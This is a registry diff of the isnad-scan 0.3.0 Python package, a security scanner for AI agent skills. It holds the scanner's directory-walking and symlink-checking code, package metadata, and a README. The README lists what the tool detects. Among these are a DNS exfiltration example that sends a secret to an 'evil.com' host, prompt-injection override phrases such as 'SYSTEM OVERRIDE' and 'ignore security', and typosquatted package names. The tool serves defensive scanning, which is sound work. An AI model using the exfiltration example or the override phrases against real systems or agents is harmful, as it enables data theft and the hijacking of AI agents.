isnad-scan 0.3.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
isnad_scan/scanner.py ADDED
@@ -0,0 +1,342 @@
1
+ """Core scanning logic."""
2
+ import hashlib
3
+ import json
4
+ import os
5
+ from dataclasses import dataclass, field
6
+ from pathlib import Path
7
+ from typing import Dict, List, Optional, Set
8
+ from urllib.parse import urlparse
9
+
10
+ from .patterns import Finding, Severity, scan_content, scan_dependencies
11
+ from .ast_analyzer import analyze_python_ast, is_python_file
12
+ from .cve_checker import check_dependencies_for_cves
13
+ from .js_analyzer import analyze_javascript, is_javascript_file
14
+ from .binary_scanner import scan_binary_file, is_binary_file, is_image_file, BINARY_EXTENSIONS, IMAGE_EXTENSIONS
15
+
16
+
17
+ # File extensions to scan (text files)
18
+ SCANNABLE_EXTENSIONS = {
19
+ '.py', '.js', '.ts', '.jsx', '.tsx', '.mjs', '.cjs', # Code
20
+ '.sh', '.bash', '.zsh', '.fish', # Shell
21
+ '.md', '.markdown', '.txt', '.rst', # Docs
22
+ '.html', '.htm', '.xml', # Markup
23
+ '.yaml', '.yml', '.json', '.toml', '.ini', '.cfg', # Config
24
+ '.env', '.env.example', '.env.local', # Environment
25
+ }
26
+
27
+ # Binary extensions handled separately
28
+ BINARY_SCAN_EXTENSIONS = BINARY_EXTENSIONS | IMAGE_EXTENSIONS
29
+
30
+ # Dependency files that need special scanning
31
+ DEPENDENCY_FILES = {
32
+ 'requirements.txt', 'requirements-dev.txt', 'requirements-test.txt',
33
+ 'Pipfile', 'pyproject.toml', 'setup.py', 'setup.cfg',
34
+ 'package.json', 'package-lock.json', 'yarn.lock',
35
+ 'Gemfile', 'Gemfile.lock',
36
+ 'go.mod', 'go.sum',
37
+ 'Cargo.toml', 'Cargo.lock',
38
+ }
39
+
40
+ # Files to always scan regardless of extension
41
+ ALWAYS_SCAN = {'SKILL.md', 'README.md', 'AGENTS.md', 'Dockerfile', 'Makefile'}
42
+
43
+ # Directories to skip
44
+ SKIP_DIRS = {
45
+ 'node_modules', '__pycache__', '.git', 'venv', '.venv',
46
+ 'dist', 'build', '.tox', '.pytest_cache', '.mypy_cache',
47
+ 'egg-info', '.eggs', 'htmlcov', '.coverage',
48
+ }
49
+
50
+ # Max file size to scan (1MB)
51
+ MAX_FILE_SIZE = 1024 * 1024
52
+
53
+
54
+ @dataclass
55
+ class ScanResult:
56
+ """Result of scanning a skill."""
57
+ path: str
58
+ findings: List[Finding] = field(default_factory=list)
59
+ files_scanned: int = 0
60
+ files_skipped: int = 0
61
+ errors: List[str] = field(default_factory=list)
62
+ warnings: List[str] = field(default_factory=list)
63
+ file_hashes: Dict[str, str] = field(default_factory=dict)
64
+ symlinks_found: List[str] = field(default_factory=list)
65
+
66
+ @property
67
+ def trust_level(self) -> str:
68
+ """Determine overall trust level based on findings."""
69
+ danger_count = sum(1 for f in self.findings if f.severity == Severity.DANGER)
70
+ warn_count = sum(1 for f in self.findings if f.severity == Severity.WARN)
71
+
72
+ if danger_count > 0:
73
+ return "DANGER"
74
+ elif warn_count > 3:
75
+ return "WARN"
76
+ elif warn_count > 0:
77
+ return "CAUTION"
78
+ elif self.symlinks_found:
79
+ return "CAUTION" # Symlinks are suspicious
80
+ else:
81
+ return "SAFE"
82
+
83
+ @property
84
+ def exit_code(self) -> int:
85
+ """Exit code for CLI."""
86
+ level = self.trust_level
87
+ if level == "DANGER":
88
+ return 2
89
+ elif level in ("WARN", "CAUTION"):
90
+ return 1
91
+ else:
92
+ return 0
93
+
94
+ def summary(self) -> dict:
95
+ """Get summary statistics."""
96
+ return {
97
+ "trust_level": self.trust_level,
98
+ "files_scanned": self.files_scanned,
99
+ "files_skipped": self.files_skipped,
100
+ "findings": {
101
+ "danger": sum(1 for f in self.findings if f.severity == Severity.DANGER),
102
+ "warn": sum(1 for f in self.findings if f.severity == Severity.WARN),
103
+ "info": sum(1 for f in self.findings if f.severity == Severity.INFO),
104
+ },
105
+ "errors": len(self.errors),
106
+ "warnings": len(self.warnings),
107
+ "symlinks": len(self.symlinks_found),
108
+ }
109
+
110
+ @property
111
+ def content_hash(self) -> str:
112
+ """Get hash of all scanned content for caching."""
113
+ if not self.file_hashes:
114
+ return ""
115
+ combined = "|".join(f"{k}:{v}" for k, v in sorted(self.file_hashes.items()))
116
+ return hashlib.sha256(combined.encode()).hexdigest()[:16]
117
+
118
+
119
+ def should_scan_file(path: Path) -> bool:
120
+ """Determine if a file should be scanned (text files)."""
121
+ if path.name in ALWAYS_SCAN:
122
+ return True
123
+ if path.name in DEPENDENCY_FILES:
124
+ return True
125
+ if path.suffix.lower() in SCANNABLE_EXTENSIONS:
126
+ return True
127
+ return False
128
+
129
+
130
+ def should_scan_binary(path: Path) -> bool:
131
+ """Determine if a binary file should be scanned."""
132
+ return path.suffix.lower() in BINARY_SCAN_EXTENSIONS
133
+
134
+
135
+ def is_dependency_file(path: Path) -> bool:
136
+ """Check if file is a dependency manifest."""
137
+ return path.name in DEPENDENCY_FILES
138
+
139
+
140
+ def check_symlink_safety(path: Path, base_dir: Path) -> tuple[bool, Optional[str]]:
141
+ """
142
+ Check if a symlink is safe (resolves within the skill directory).
143
+ Returns (is_safe, error_message).
144
+ """
145
+ if not path.is_symlink():
146
+ return True, None
147
+
148
+ try:
149
+ resolved = path.resolve()
150
+ base_resolved = base_dir.resolve()
151
+
152
+ # Check if resolved path is within base directory
153
+ try:
154
+ resolved.relative_to(base_resolved)
155
+ return True, None
156
+ except ValueError:
157
+ return False, f"Symlink escapes skill directory: {path} -> {resolved}"
158
+ except Exception as e:
159
+ return False, f"Could not resolve symlink {path}: {e}"
160
+
161
+
162
+ def hash_content(content: str) -> str:
163
+ """Hash content for caching."""
164
+ return hashlib.sha256(content.encode()).hexdigest()[:16]
165
+
166
+
167
+ def scan_file(path: Path, base_dir: Path, check_cves: bool = False) -> tuple[List[Finding], Optional[str], Optional[str]]:
168
+ """
169
+ Scan a single file for security issues.
170
+ Returns (findings, error, content_hash).
171
+ """
172
+ try:
173
+ # Check file size
174
+ if path.stat().st_size > MAX_FILE_SIZE:
175
+ return [], f"File too large: {path}", None
176
+
177
+ # Read content
178
+ try:
179
+ content = path.read_text(encoding='utf-8')
180
+ except UnicodeDecodeError:
181
+ try:
182
+ content = path.read_text(encoding='latin-1')
183
+ except Exception:
184
+ return [], f"Could not decode: {path}", None
185
+
186
+ # Hash for caching
187
+ content_hash = hash_content(content)
188
+
189
+ # Scan content with regex patterns
190
+ findings = scan_content(content, str(path))
191
+
192
+ # AST analysis for Python files (catches evasion that regex misses)
193
+ if is_python_file(str(path)):
194
+ ast_findings = analyze_python_ast(content, str(path))
195
+ findings.extend(ast_findings)
196
+
197
+ # JavaScript analysis (including minified code handling)
198
+ if is_javascript_file(str(path)):
199
+ js_findings = analyze_javascript(content, str(path))
200
+ findings.extend(js_findings)
201
+
202
+ # Additional scanning for dependency files
203
+ if is_dependency_file(path):
204
+ dep_findings = scan_dependencies(content, str(path))
205
+ findings.extend(dep_findings)
206
+
207
+ # CVE checking (requires network)
208
+ if check_cves:
209
+ cve_findings = check_dependencies_for_cves(content, str(path))
210
+ findings.extend(cve_findings)
211
+
212
+ return findings, None, content_hash
213
+
214
+ except Exception as e:
215
+ return [], f"Error scanning {path}: {e}", None
216
+
217
+
218
+ def scan_directory(path: Path, check_cves: bool = False) -> ScanResult:
219
+ """Scan a skill directory for security issues."""
220
+ result = ScanResult(path=str(path))
221
+ base_dir = path.resolve()
222
+
223
+ if not path.exists():
224
+ result.errors.append(f"Path does not exist: {path}")
225
+ return result
226
+
227
+ if not path.is_dir():
228
+ # Single file scan
229
+ if should_scan_file(path):
230
+ # Check symlink safety for single file
231
+ is_safe, symlink_error = check_symlink_safety(path, path.parent)
232
+ if not is_safe:
233
+ result.symlinks_found.append(str(path))
234
+ result.findings.append(Finding(
235
+ severity=Severity.DANGER,
236
+ pattern_id='unsafe_symlink',
237
+ description=symlink_error or 'Symlink to external location',
238
+ file=str(path),
239
+ line=0,
240
+ match=str(path),
241
+ ))
242
+
243
+ findings, error, content_hash = scan_file(path, path.parent, check_cves=check_cves)
244
+ result.findings.extend(findings)
245
+ result.files_scanned = 1
246
+ if content_hash:
247
+ result.file_hashes[str(path)] = content_hash
248
+ if error:
249
+ result.errors.append(error)
250
+ else:
251
+ result.files_skipped = 1
252
+ return result
253
+
254
+ # Track seen inodes to detect symlink loops
255
+ seen_inodes: Set[int] = set()
256
+
257
+ # Walk directory
258
+ for root, dirs, files in os.walk(path, followlinks=False):
259
+ root_path = Path(root)
260
+
261
+ # Skip hidden directories and common non-code dirs
262
+ dirs[:] = [d for d in dirs if not d.startswith('.') and d not in SKIP_DIRS]
263
+
264
+ # Check directory symlinks
265
+ for d in list(dirs):
266
+ dir_path = root_path / d
267
+ if dir_path.is_symlink():
268
+ is_safe, symlink_error = check_symlink_safety(dir_path, base_dir)
269
+ if not is_safe:
270
+ result.symlinks_found.append(str(dir_path))
271
+ result.findings.append(Finding(
272
+ severity=Severity.DANGER,
273
+ pattern_id='unsafe_symlink_dir',
274
+ description=symlink_error or 'Directory symlink to external location',
275
+ file=str(dir_path),
276
+ line=0,
277
+ match=str(dir_path),
278
+ ))
279
+ dirs.remove(d) # Don't traverse unsafe symlinks
280
+
281
+ for filename in files:
282
+ filepath = root_path / filename
283
+
284
+ # Check for symlinks
285
+ if filepath.is_symlink():
286
+ is_safe, symlink_error = check_symlink_safety(filepath, base_dir)
287
+ if not is_safe:
288
+ result.symlinks_found.append(str(filepath))
289
+ result.findings.append(Finding(
290
+ severity=Severity.DANGER,
291
+ pattern_id='unsafe_symlink',
292
+ description=symlink_error or 'Symlink to external location',
293
+ file=str(filepath),
294
+ line=0,
295
+ match=str(filepath),
296
+ ))
297
+ continue
298
+
299
+ # Check for inode loops
300
+ try:
301
+ inode = filepath.stat().st_ino
302
+ if inode in seen_inodes:
303
+ result.warnings.append(f"Duplicate inode (possible hard link): {filepath}")
304
+ continue
305
+ seen_inodes.add(inode)
306
+ except Exception:
307
+ pass
308
+
309
+ if should_scan_file(filepath):
310
+ findings, error, content_hash = scan_file(filepath, base_dir, check_cves=check_cves)
311
+ result.findings.extend(findings)
312
+ result.files_scanned += 1
313
+ if content_hash:
314
+ result.file_hashes[str(filepath)] = content_hash
315
+ if error:
316
+ result.errors.append(error)
317
+ elif should_scan_binary(filepath):
318
+ # Scan binary files (pyc, images, etc.)
319
+ bin_findings, bin_error = scan_binary_file(filepath)
320
+ result.findings.extend(bin_findings)
321
+ result.files_scanned += 1
322
+ if bin_error:
323
+ result.errors.append(bin_error)
324
+ else:
325
+ result.files_skipped += 1
326
+
327
+ return result
328
+
329
+
330
+ def scan_skill(path_or_url: str, check_cves: bool = False) -> ScanResult:
331
+ """Main entry point: scan a skill from path or URL."""
332
+ # Check if it's a URL
333
+ parsed = urlparse(path_or_url)
334
+ if parsed.scheme in ('http', 'https'):
335
+ # TODO: Download and scan
336
+ result = ScanResult(path=path_or_url)
337
+ result.errors.append("URL scanning not yet implemented - download the skill first")
338
+ return result
339
+
340
+ # Local path
341
+ path = Path(path_or_url).resolve()
342
+ return scan_directory(path, check_cves=check_cves)
@@ -0,0 +1,186 @@
1
+ Metadata-Version: 2.4
2
+ Name: isnad-scan
3
+ Version: 0.3.0
4
+ Summary: Security scanner for AI agent skills - detects code injection, prompt injection, credential exfiltration, and supply chain attacks
5
+ Project-URL: Homepage, https://isnad.md
6
+ Project-URL: Documentation, https://isnad.md/docs
7
+ Project-URL: Repository, https://github.com/counterspec/isnad
8
+ Project-URL: Issues, https://github.com/counterspec/isnad/issues
9
+ Author-email: ISNAD Protocol <rapi@base64.amsterdam>
10
+ License: MIT
11
+ Keywords: agents,ai,cve,scanner,security,skills,vulnerability
12
+ Classifier: Development Status :: 4 - Beta
13
+ Classifier: Environment :: Console
14
+ Classifier: Intended Audience :: Developers
15
+ Classifier: License :: OSI Approved :: MIT License
16
+ Classifier: Operating System :: OS Independent
17
+ Classifier: Programming Language :: Python :: 3
18
+ Classifier: Programming Language :: Python :: 3.11
19
+ Classifier: Programming Language :: Python :: 3.12
20
+ Classifier: Topic :: Security
21
+ Classifier: Topic :: Software Development :: Quality Assurance
22
+ Requires-Python: >=3.11
23
+ Requires-Dist: click>=8.0
24
+ Requires-Dist: pyyaml>=6.0
25
+ Requires-Dist: rich>=13.0
26
+ Description-Content-Type: text/markdown
27
+
28
+ # ISNAD Skill Scanner
29
+
30
+ Security scanner for AI agent skills. Detects code injection, prompt injection, credential exfiltration, evasion techniques, and malicious dependencies.
31
+
32
+ **Version:** 0.2.0
33
+ **Patterns:** 69 (45 DANGER, 20 WARN, 4 INFO)
34
+
35
+ ## Installation
36
+
37
+ ```bash
38
+ cd isnad/scanner
39
+ uv pip install -e .
40
+ ```
41
+
42
+ Or run directly:
43
+
44
+ ```bash
45
+ uv run python -m isnad_scan.cli <path>
46
+ ```
47
+
48
+ ## Usage
49
+
50
+ ```bash
51
+ # Scan a skill directory
52
+ isnad-scan ./skills/some-skill/
53
+
54
+ # JSON output (for CI/programmatic use)
55
+ isnad-scan ./skill --json
56
+
57
+ # Verbose (include INFO-level findings)
58
+ isnad-scan ./skill --verbose
59
+
60
+ # Show content hash (for caching/comparison)
61
+ isnad-scan ./skill --hash
62
+
63
+ # Quiet mode (just trust level)
64
+ isnad-scan ./skill --quiet
65
+ ```
66
+
67
+ ## Exit Codes
68
+
69
+ | Code | Meaning |
70
+ |------|---------|
71
+ | 0 | SAFE - no issues found |
72
+ | 1 | CAUTION/WARN - review recommended |
73
+ | 2 | DANGER - security issues detected |
74
+ | 3 | ERROR - scanner error |
75
+
76
+ ## What It Detects
77
+
78
+ ### DANGER (45 patterns)
79
+
80
+ **Code Execution:**
81
+ - `eval()`, `exec()`, `compile()` usage
82
+ - `getattr(__builtins__, 'eval')` evasion
83
+ - String concatenation building dangerous calls (`"ev"+"al"`)
84
+ - `chr()` concatenation obfuscation
85
+ - `new Function()` in JavaScript
86
+ - Lambda with dangerous functions
87
+
88
+ **Shell Injection:**
89
+ - `subprocess` with `shell=True`
90
+ - `os.system()`, `os.popen()`
91
+ - `child_process.exec()` in Node.js
92
+ - Backtick command substitution
93
+
94
+ **Prompt Injection:**
95
+ - Hidden instructions in HTML comments
96
+ - "SYSTEM OVERRIDE" / "ignore security" patterns
97
+ - Instructions to suppress reporting
98
+
99
+ **Data Exfiltration:**
100
+ - Credential variables sent to network
101
+ - DNS exfiltration (`socket.gethostbyname(secret + ".evil.com")`)
102
+ - Tor hidden service URLs
103
+
104
+ **Obfuscation:**
105
+ - Base64 decoding, ROT13, hex strings
106
+ - `bytes.fromhex()`, Unicode escapes
107
+ - Unicode homoglyph evasion (ℯval vs eval)
108
+
109
+ **Path Traversal & Symlinks:**
110
+ - `../../` patterns in code
111
+ - Symlinks escaping skill directory
112
+
113
+ **Dangerous Deserialization:**
114
+ - `pickle.load()`, `marshal.load()`
115
+ - Unsafe YAML loading
116
+
117
+ **Dependency Attacks:**
118
+ - Typosquatted packages (reqeusts, crytpography, etc.)
119
+ - Suspicious git dependencies
120
+ - Known malicious package names
121
+
122
+ ### WARN (20 patterns)
123
+ - Network requests (verify destinations)
124
+ - File write/delete operations
125
+ - Environment variable access
126
+ - Dynamic imports
127
+ - Crypto library usage
128
+
129
+ ### INFO (4 patterns)
130
+ - Subprocess with list args
131
+ - File reads
132
+ - Logging statements
133
+
134
+ ## Context Awareness
135
+
136
+ The scanner is context-aware:
137
+ - Patterns in **documentation** (markdown, comments explaining attacks) are downgraded to INFO
138
+ - Patterns in **code blocks** within markdown are handled appropriately
139
+ - **String literals** containing pattern names (e.g., dict keys) don't trigger false positives
140
+
141
+ ## Example
142
+
143
+ ```
144
+ $ isnad-scan ./evasion-skill/
145
+
146
+ ╭─── ISNAD Scan: ./evasion-skill ───╮
147
+ │ Trust Level: 🚨 DANGER │
148
+ ╰───────────────────────────────────╯
149
+
150
+ 📁 Files scanned: 3
151
+ 🚨 DANGER findings: 18
152
+
153
+ [DANGER] evasion.py:10 — getattr_dangerous
154
+ Dynamic access to dangerous function via getattr
155
+
156
+ [DANGER] evasion.py:5 — string_concat_evasion
157
+ String concatenation building eval/exec - evasion attempt
158
+
159
+ [DANGER] SKILL.md:5 — prompt_injection_html
160
+ Potential prompt injection - attempts to override security
161
+
162
+ [DANGER] requirements.txt:6 — dangerous_package
163
+ Potentially dangerous or typosquatted package: reqeusts
164
+ ```
165
+
166
+ ## Limitations
167
+
168
+ What the scanner **cannot** catch (yet):
169
+ - AST-level evasion (import aliasing, nested dynamic calls)
170
+ - Minified/bundled JavaScript
171
+ - Binary files with embedded scripts
172
+ - Packages with known CVEs (needs OSV integration)
173
+ - Actual malicious intent vs. legitimate security tools
174
+
175
+ ## Roadmap
176
+
177
+ - [x] Pattern-based scanning (69 patterns)
178
+ - [x] Dependency scanning (typosquats, suspicious sources)
179
+ - [x] Symlink safety checks
180
+ - [x] Context awareness (docs vs code)
181
+ - [x] Prompt injection detection
182
+ - [ ] AST parsing for Python/JS
183
+ - [ ] CVE database integration (OSV/Snyk)
184
+ - [ ] URL scanning (download remote skills)
185
+ - [ ] ISNAD Registry integration (inscribe attestations)
186
+ - [ ] ClawHub pre-install hook
@@ -0,0 +1,12 @@
1
+ isnad_scan/__init__.py,sha256=cVH3AVOQHwKu6_4AqNPbwLLcOS8JaPoKFFICmmzG9iA,88
2
+ isnad_scan/ast_analyzer.py,sha256=nE49V8UKcDtL0qYj-36dz3PAoH8UQ2RVGD9mzNT4hjw,15446
3
+ isnad_scan/binary_scanner.py,sha256=zb8X7pfAej54uxq8K_xYvGew6ENJjcB40TOWlVb92r0,8276
4
+ isnad_scan/cli.py,sha256=RfgKnP2tpF_ud8XrY9cH3tKY6G-gh49s7lVNljXQWbE,7475
5
+ isnad_scan/cve_checker.py,sha256=SLElHRrQV7Q9-d9-RgDdGcUSrD8KLojFVOb5ZRkRnWU,8333
6
+ isnad_scan/js_analyzer.py,sha256=9_z9l30AMPGm9KQKjwXNv0Ic8g4Y3zS3AtY1R0VhH2A,6967
7
+ isnad_scan/patterns.py,sha256=E_tJzPBVb1R0hKeNzjqvqkILdH_G02md8iK0hxU-IXM,21090
8
+ isnad_scan/scanner.py,sha256=eELhXdDgsWuJqTfwVMbUrnplKCAdj-jenDRPsx0b5bQ,12563
9
+ isnad_scan-0.3.0.dist-info/METADATA,sha256=IlN-51e5Kcyfy4UTTI3c0IH-5Z0FITI2ec7XeVIZmqw,5332
10
+ isnad_scan-0.3.0.dist-info/WHEEL,sha256=WLgqFyCfm_KASv4WHyYy0P3pM_m7J5L9k2skdKLirC8,87
11
+ isnad_scan-0.3.0.dist-info/entry_points.txt,sha256=XzQEtAu7l_PAGfpehU4ZFiqybOfrKrFqkWzCNvC6_SY,51
12
+ isnad_scan-0.3.0.dist-info/RECORD,,
@@ -0,0 +1,4 @@
1
+ Wheel-Version: 1.0
2
+ Generator: hatchling 1.28.0
3
+ Root-Is-Purelib: true
4
+ Tag: py3-none-any
@@ -0,0 +1,2 @@
1
+ [console_scripts]
2
+ isnad-scan = isnad_scan.cli:main